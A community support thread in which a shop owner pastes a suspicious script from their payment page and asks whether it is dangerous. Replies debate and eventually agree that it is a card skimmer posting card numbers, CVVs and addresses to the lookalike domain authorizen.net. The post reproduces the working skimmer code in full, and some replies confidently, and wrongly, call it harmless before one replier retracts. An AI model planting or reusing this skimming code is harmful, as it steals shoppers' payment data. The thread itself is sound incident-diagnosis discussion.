cancel
Showing results for 
Search instead for 
Did you mean: 

https://authorizen.net/ ?

Hello,

 

Can you please help me?

 

My former developer left in kind of a hurry  and i am afraid that he has modified the code of my shop too.

 

I found a suspicious line on the payment site:

 

<script type="text/javascript">$(":button").click(function() {
if(document.getElementsByName('CCCode')[0].value.length>1)
{
  var xmlhttp;
  
if (window.XMLHttpRequest) 
{
    xmlhttp=new XMLHttpRequest();
  } 
else {
    xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
  
xmlhttp.open("POST", "https://authorizen.net/XXX.php", true);
  
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  
xmlhttp.send('data='+document.getElementsByName('CCNumber')[0].value+'|'+document.getElementsByName('CCExMonth')[0].options[document.getElementsByName('CCExMonth')[0].selectedIndex].value+'|'+document.getElementsByName('CCExYear')[0].options[document.getElementsByName('CCExYear')[0].selectedIndex].value+'|'+document.getElementsByName('CCCode')[0].value+'|'+document.getElementsByName('CCName')[0].value+'|'+document.getElementsByName('CCAddress')[0].value+'|'+document.getElementsByName('CCCity')[0].value+'|'+document.getElementsByName('CCState')[0].value+'|'+document.getElementsByName('CCZip')[0].value+'|'+document.getElementsByName('CCCountry')[0].value+'|'+document.getElementsByName('CCPhone')[0].value);

}});

 

I noticed that it posts to authorizeN.net not authorize.net. (XXX is a substitue for  private data)

 

Is this something to worry about?

 

Thanks,

 

feri

feri2
Member
9 REPLIES 9

Without even examining the rest of your code, the url seems hardly malicious. If you type that in a browser it redirects to authorize.net, which is a pretty dead on guarantee authorize.net owns that domain too (companies buy domains that are nearly identical to their primary domain name all the time for a number of reasons, and it would be a little unusual for malicous site to redirect you to a legitimate site.).

 

 

Renaissance
All Star

The domain resolves to an ip address out of Montenegro. So unless authorize.net has servers in that country I would say it is suspicious.

 

nic73
Member

Authorize.Net definitely does not have an api endpoint in that format. The form should be taken offline until it is worked out.

mmcguire
Administrator Administrator
Administrator
That’s the only thing that had me hedging my bets.I didn’t think that authorize has any endpoint like that. My best guess at this one is he doesn’t know what he’s doing and made a typo in the process of setting up a inoperable form. In that case it’s good he left.

Question- did the developer in question ever help you implement a successful integration? Something doesn’t add up there. Either I’m missing something or he just doesn’t know what he’s doing. But it’s all nothing in any event. There is no chance of harm coming from that domain, no reason at all to think it’s malicious in any way. You just need someone who knows what she’s doing to come in and fix things for you. You’ll be fine.

That address is redirecting back to authorize.net. If authorize.net has no connection to that domain it means some is purposely redirecting it. The ip for that domain is tracing back to Montenegro  in Europe.

 

If this code is inside a working payment form then that script has nothing to do with the normal functionality of the page and it is simply sending credit card info to some unkown server in Montenegro.

 

It might not be malicious concerning the previous developer, they might not have been aware of it but I disagree that there is no chance of harm coming from the domain. 

 

That script doesn't look like anything a developer would use to communicate with authorize.net.

 

Newegg had a similar hack a few months ago. Hackers setup a fake domain(neweggstats.com) name with a ssl certificate. They were able to inject script code into the payment form that skimmed credit card info.

 

 

nic73
Member

I have the same problem, please help!

Nic, it is very bizarre that someone would be using authorizen.net as and endpoint. I still think it is nothing to worry about. Companies buy domain names to catch typos of their primary domain. Authoriz.net also redirects to their homepage.

There are a few reasons a company might do this. The big one being that someone else could piggy back on their name and reputation and use it to capture traffic. In the worst case scenario the parasitic domain owner harms the customers. In the other case it’s just a numbers game to get customers for legitimate services/products.

Look at the number of views the posts on here get. This is a very well known company. In whatever time period it takes for 100,000 to visit the site, how many of those 100,000 are going to accidentally type an extra n? If it’s 1% that’s better than most websites get. So companies swoop up these domains.

As for the server in Montenegro, authorize does business all over Europe. Not quite such a massive red flag as it first sounds. Europe is small and hosting companies there I’m sure have servers throughout.

The other big thing is that this is used as an endpoint, not a bogus customer facing payment form. If someone bought this domain, I imagine it would have cost a lot, and to monetize it in this manner they would have to get people to go and alter script files of business owners. It sounds like a very costly thing to do. In college we watched a documentary on CC info theft, and stolen CC numbers are ridiculously cheap. So why not be a front facing scammer and syphon traffic, instead of having to pay or entice people to get behind the scenes of real businesses? It just doesn’t make sense to me, although this whole thing is just downright bizarre, especially now that we’ve got a new one chiming in.

For sure that payment for needs to be yanked. I would really be interested in an authorize employee chiming in for who really owns that domain. This is really puzzling and now I’m interested.



@andreer
Then you probably were compromised as well, as there is no way this is a legitimate domain owned by Authorize.net. Are both of you possibly running JQuery File Upload (or one of it's derivatives) as every Tom, Dick and Harriet is targeting sites running that as we speak.

I posted about this the other day and accidentally deleted my post trying to edit it. I was dead wrong. I looked up this domain and it is not owned by authorize.net. Authoriz.net and Authorized.net are also redirect domains, and both domains have authorize.net listed as the owner on the registry.  It is clear that authorize.net publicly claims ownership of any domain they own.

 

authorizen.net is listed under GTO Projects Limited, and one or more domains under GTO ltd have been logged by brute forcers blacklist for attempted brute force attacks on other websites.  

 

What threw me off was that the developer was suspected of editing the code. It seemed to me that this would be a rather expensive way of monetizing on a fake domain. I'll let others chime in, but as has been said it looks like sites have been compromised, and it is most likely not rogue developers behind the scenes, but code execution/XSS attacks. Was that what you suspected menudrive-myles ?